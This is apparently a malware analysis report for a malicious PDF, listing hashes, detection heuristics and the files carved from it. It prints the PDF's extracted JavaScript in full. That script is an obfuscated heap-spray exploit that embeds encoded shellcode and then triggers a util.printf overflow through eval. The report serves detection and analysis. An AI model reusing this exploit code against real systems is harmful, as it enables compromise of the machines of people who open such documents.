Malicious PDF — malware analysis report

Static analysis result for SHA-256 2ddf0cd1ed76d563…

MALICIOUS

PDF

5.1 KB First seen: 2026-05-11
MD5: ab04586bbf696314dc9fb625cbb3eeb7 SHA-1: 1a712ca2afd32032f43215c662550fb9a9e58ad5 SHA-256: 2ddf0cd1ed76d5632993b4670269846d721fef5085cceb74d863f3307d16fd6d
66 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9998

Heuristics 3

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0003_000.js pdf-javascript-stream PDF /JS object 3 at offset 0x99 4162 bytes
SHA-256: 59e43d7f70ecf389519e2e9bb44afdd1182e096a9a9bf7cfaa4f031d20d7d9ff
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). 10 of 19 identifiers look randomly generated (e.g. 'EDHypJOiDLwZSUAhV') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function KNGEFgxgwOjEs(u) {return eval(u);}function owkEwwZ(u) {return unescape(u);}var jwKiNYMATQtquZbZ ="";var xxJPCbOVWBPSuUrxp = owkEwwZ("%u4a27%ufd4e%ufc2f%u4046%u999b%ufcf5%u9837%u914f%u3f42%u46fd%u9146%u9f96%u9991%u98f8%u4099%u4342%u9f90%u9f2f%u3748%u914e%u9290%u4e4f%ufc4e%u90d6%u4a47%u9b46%u97f8%u4b37%u46f5%u4e2f%u9343%ufd42%u4b42%u4797%ufc96%u9099%u4998%u9b91%u9743%u989b%u484e%u4741%u994a%u2f37%u4b47%u4e40%u9099%u9293%u37fc%u464f%ufd99%u97f9%u93f9%u4af8%ud697%u4042%ufdd6%u273f%ud643%u4048%u439b%u2ff9%u3747%u43d6%u2f46%u982f%u9bd6%u4947%u374b%u49f8%u9349%u4648%u4137%u2737%uf937%u4891%u41fd%u9341%ufd97%u409b%u9943%u49d6%u2ff8%u9846%u9127%u9ff5%uf946%uf990%u9827%u4093%u9893%u4143%u90f9%u969f%u924b%u4b93%u974f%u2741%u42f5%u91fc%u41fc%u279f%u4afd%u99f8%u4848%uf99b%u9298%u3f46%u2f37%uf927%ud698%u9b97%u994f%u412f%u4797%u4690%ufd91%u4ff5%u902f%u4a99%ud648%u9249%u2f40%u9696%u964e%u9227%u4f40%u47fd%uf89b%u4041%u974b%u493f%u9b90%u9f41%u4348%ud64a%u9699%u27f5%u90d6%u91f9%u484b%u3fd6%u4bd6%u494b%u4398%u989f%u419f%u9ff5%uf846%u9296%u4e93%u43d6%uf8fd%u9792%u2f96%u3f97%u484a%ufd90%u4941%u9143%u4a49%u9199%u48fc%ufcf8%ud640%u4f92%u49f5%u4b46%u9692%u3ffc%u989b%u934b%u3749%u9343%uf54b%u419b%u9740%u4099%u462f%u4049%u9042%u9893%uf84b%u2f92%u9990%uf890%u272f%ud64e%u4198%u4a9f%u274f%u9647%u4b46%ufc96%ufc9b%ufd46%uf842%u4e4e%u484e%u4848%u9849%u3f93%u9190%u9799%uf899%u4a92%u4641%u4190%u4b47%u3f93%u4692%u4bf8%u9bf8%u90f9%u4348%u464a%u4296%ufc4e%u4241%ufc92%u9b97%ufc47%ufc27%u4b93%ufd4b%u989b%u40f5%uf896%u2f48%u4741%uf89b%u4b90%u37d6%u4027%u474a%u9f27%u4f91%u469f%u9340%u4649%u4b48%u499b%u9891%u984a%u9247%u9bfd%u4b98%u9827%u274f%u4b41%u4e4a%u49f8%ud6fc%ufc9f%u4a4f%u934b%u999b%u4299%u47f9%u2799%u972f%u4bf5%uf59b%u4740%u4f92%u48fc%u40fd%u9997%u9747%u4b4e%ufdfc%u4b93%u989f%u91fd%u2f40%u979b%u9098%u9192%u4242%ufd4b%u4249%u4146%u4a48%u4e47%u929b%u9937%u9937%u424a%u9848%u49fc%u4b4a%u4696%u4af9%u4897%uf996%ufd9b%u9192%u4f4a%u4293%u4792%u4843%ud64b%u4999%u9ff8%u984b%u4a92%u4043%ufcf5%u272f%u4742%u3798%u414e%u9241%ufd4e%u9b4a%u2f40%u9b96%u4e4f%u9740%u973f%u479f%u933f%u4bd6%u3f2f%u2748%u494b%u469f%u4a92%ufc48%u904e%u9349%u4b4f%uf8f9%uf94e%u962f%u922f%u9837%u4696%u2743%ufd9b%u4397%uf53f%u99f9%u429f%u49d6%u979b%u47f8%u429f%u9093%u4b4f%uf940%uf92f%u9f4e%uf546%u4943%ufd27%u3793%u9b4b%u9bd6%u279f%u4f9f%u374b%u9646%u4698%uf89f%u40f8%u9346%u9327%u9643%u9741%u903f%u2f92%u9098%u9146%u4b93%u9b9b%u9b4b%u4391%u3792%u4290%u4e9f%ud64b%u984f%u484a%u964f%u4f37%u9f92%u924b%u46f9%ud697%u4f37%u422f%u402f%u9049%ubb47%u82cc%u09ac%uc933%u35b1%ucbd9%u74d9%uf424%u315a%u0e5a%uea83%u03fc%u8896%ufc4e%ue5da%u43d5%u9c68%u3e01%u606c%u29d2%u9ef4%ua758%u75ec%ub85d%ue1ec%u6023%u820e%ub033%u65ce%u59c4%u65ce%u99c4%udd91%u99d2%u1e2d%u61da%u1f47%u6e8c%u3bc3%ufb3c%ubceb%udf68%u8ee3%u7ef2%u6d9f%ue0f5%u1ed4%uc8d1%u9b61%u8225%u2121%u952e%ua223%u8184%uef38%uab38%u21d5%u48f9%u0b04%uba72%u8add%uf26a%u201e%u154a%u3e94%u1a6a%u4059%u4eab%u7995%ub54f%u0b71%u3e4d%ud723%uaa90%u9cb5%u679f%uf9b2%u7683%u762f%uf3bf%u61ae%u4749%u5994%u24c3%ubdf0%u77b2%ud998%u6dbf%u2268%u8dc0%u6803%u06cc%u797a%u4d47%ub07c%u578c%uc696%u2311%u0f14%u2b3c%u7e81%u7a3f%u2df1%u1c83%u2f8d%ufed0%uffac%ufe25%ue2e9%u3bc6%uc689%ub702%u172b%ud5c0%uc0be%u855f%ucb64%uf53e");var uFgfJdQxABDorHK = owkEwwZ("%u49f9%u9197%u49fc%u3790%u4a3f%u9848%u4199%u9747");for (kDnLAqUUdXy=0;kDnLAqUUdXy<32;kDnLAqUUdXy++)  jwKiNYMATQtquZbZ += owkEwwZ("%u914e%u4f2f%u9bf5%u90f5%u4849%u474e%uf8f9%u4e92");WayriLBB = 20 + jwKiNYMATQtquZbZ.length + xxJPCbOVWBPSuUrxp.length;while (uFgfJdQxABDorHK.length<WayriLBB) uFgfJdQxABDorHK+=uFgfJdQxABDorHK;NOnSixZWzFRWfLJ = uFgfJdQxABDorHK.substring(0, WayriLBB);vYXFodDBXDx = uFgfJdQxABDorHK.substring(0, uFgfJdQxABDorHK.length-WayriLBB);while(vYXFodDBXDx.length+WayriLBB < 0x60000) vYXFodDBXDx = vYXFodDBXDx+vYXFodDBXDx+NOnSixZWzFRWfLJ;gjAsgpeZOrWx = new Array();for (kDnLAqUUdXy=0;kDnLAqUUdXy<1400;kDnLAqUUdXy++) gjAsgpeZOrWx[kDnLAqUUdXy] = vYXFodDBXDx + jwKiNYMATQtquZbZ + xxJPCbOVWBPSuUrxp;EDHypJOiDLwZSUAhV="ut" + "il." + "pr" + "intf" ;aXrxeETZeBcP='("' + '%' + '40' + '002' + '.400' + '12' + 'f"';ApViDJhrtIYtOjjkk = EDHypJOiDLwZSUAhV+aXrxeETZeBcP+",3.14);";KNGEFgxgwOjEs(ApViDJhrtIYtOjjkk);
javascript_obj0003_000_shellcode_00.bin pdf-js-shellcode pdf-js-unescape-shellcode recovered from PDF /JS object 3 at offset 0x99 1024 bytes
SHA-256: 09ccbd6e99be49e6c1abfa83eab844379ff62e8f4b68e8358c98a2182c7ac20c

Open this report in the interactive analyzer, or submit your own file for analysis.